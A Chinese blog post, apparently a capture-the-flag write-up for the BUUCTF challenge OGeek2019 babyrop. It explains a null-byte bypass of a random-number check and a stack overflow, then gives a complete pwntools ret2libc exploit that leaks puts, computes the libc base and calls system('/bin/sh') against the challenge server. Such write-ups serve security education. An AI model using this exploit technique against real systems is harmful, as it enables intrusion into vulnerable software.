OGeek2019_babyrop

最新推荐文章于 2023-04-02 16:58:08 发布
最新推荐文章于 2023-04-02 16:58:08 发布
阅读量276 收藏
点赞数
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/121712307
版权
这篇博客详细介绍了如何通过精心构造的输入利用ROP(Return-Oriented Programming)技术,实现内存溢出并控制缓冲区,进而利用puts地址找到libc基址,完成系统调用,最终实现代码执行。作者通过一步步的步骤解析了关键点,如随机数控制、溢出漏洞利用和rop链的构建。
摘要由CSDN通过智能技术生成

OGeek2019_babyrop

查看保护
请添加图片描述
请添加图片描述
取了一个随机数,接着跟进一下804871f
请添加图片描述
匹配用户输入的是否与随机数相等。这里使用\x00来绕过,返回了一个v5,v5没有给值,我们再接着往下看
请添加图片描述
这个函数内a1超过0xE7就会溢出过ebp,所以我们让a1为0xff,就可以溢出很长的空间,这里的a1也就是上面的v5,所以我们肯定要控制v5,看一下v5和buf的关系
请添加图片描述
804871f这个函数内可以让buf输入0x20个字符,v5和buf距离为7,这样我们就可以控制v5了。接下来rop就好了

from pwn import *
from LibcSearcher import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 28191)
else:
    r = process(file_name)

elf = ELF(file_name)
libc = ELF('libc-2.23.so')

def dbg():
    gdb.attach(r)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x8048825

p1 = b'\x00' + b'6' * 6 + b'\xff'
r.sendline(p1)

r.recvuntil('Correct\n')

p2 = b'a' * (0xe7 + 4) + p32(puts_plt) + p32(main_addr) + p32(puts_got)
r.sendline(p2)

puts_addr = u32(r.recv(4))
success('puts_addr = ' + hex(puts_addr))

libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh\x00').__next__()

'''
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')
'''

r.sendline(p1)
r.recvuntil('Correct\n')

p3 = b'a' * (0xe7 + 4) + p32(system_addr) + p32(0) + p32(bin_sh)
r.sendline(p3)

r.interactive()
z1r0.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buuctf-[OGeek2019]babyrop
weixin_44864859的博客
04-09 2218
查看主函数 int __cdecl main() { int buf; // [esp+4h] [ebp-14h] char v2; // [esp+Bh] [ebp-Dh] int fd; // [esp+Ch] [ebp-Ch] sub_80486BB(); fd = open("/dev/urandom", 0); if ( fd > 0 ) read...
[OGeek2019]babyrop
m0sway的博客
03-22 1116
[OGeek2019]babyrop WriteUp BUU_PWN
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 425
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3739
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
oGeek_Ray_1-数据集
03-30
标题 "oGeek_Ray_1-数据集" 暗示我们正在处理一个与数据相关的集合,可能是用于分析、机器学习或数据挖掘任务。标签 "数据集" 确认了这一点,意味着这个压缩包包含一个或多个数据文件,供用户进行数据处理。 根据...
OGeek_round1-数据集
03-29
标题中的“OGeek_round1-数据集”指的是一个与OGeek竞赛第一轮相关的数据集,这通常意味着它包含了用于训练和评估机器学习或数据分析模型的数据。在数据科学和机器学习领域,数据集是至关重要的,它们是构建预测模型...
TianChi_OGeek
03-19
"TianChi_OGeek"很可能是一个与数据分析或机器学习相关的项目,参与者需要解决特定的数据问题并提交解决方案。在这个项目中,我们遇到了一个具体的问题,即在训练数据集(train)的第1815102行存在一个遗漏的引号,这...
天池OGeek算法挑战赛数据.zip
12-21
标题中的“天池OGeek算法挑战赛数据.zip”表明这是一个与阿里巴巴天池平台上的OGeek算法竞赛相关的数据集。天池是阿里云主办的一个数据科学和机器学习竞赛平台,旨在促进数据科学的发展和应用,挑战赛通常涉及到各种...
OGeek
03-19
lgb 代码入口:sh base_run.sh。 写了很多冗余特征,跑起来非常慢,需要做一下特征选择。 线上提交后0.7154。 代码中用到了分词和词向量,需要将切词的代码换成自己的切词代码,需要自己提供词向量。...
软件如何画pcb螺丝孔_如何画函数图像(常见函数篇)——动态数学软件GeoGebra...
weixin_33397994的博客
01-13 450
在GeoGebra里,一输入表达式,函数图像瞬间出来。下面,我们来看看常见函数是如何输入的。分类普通函数例:f(x) = sin(2x),g(x) = x² + 2【直接输入“=”右边的式子即可】分别输入sin(2x) , x^2 + 2系数待定的函数【法一】输入表达式,再点“创建滑动条”例:f(x) = k x + b输入k x + b,再“创建滑动条”【法二】先创建滑动条,再输入表达式例:f(...
2020-11-11
weixin_52232741的博客
11-11 175
Python文件操作函数 1.Read()函数 函数说明 Read from stream. 函数语法 read(size=-1, /),返回值为str f.read() #全部读取 f.read(100) #读取100个字符 2.Readline()函数 函数说明 Read from stream until newline or EOF. 函数语法 readline(size=-1, /),返回值为str f.readline() #读取一行数据 3. Write()函数 函数说明 Write
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1258
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 515
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
BUUCTF pwn——[OGeek2019]babyrop
最新发布
CNS-Enterprise BCC-1701-J
04-02 247
BUUCTF 做题练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值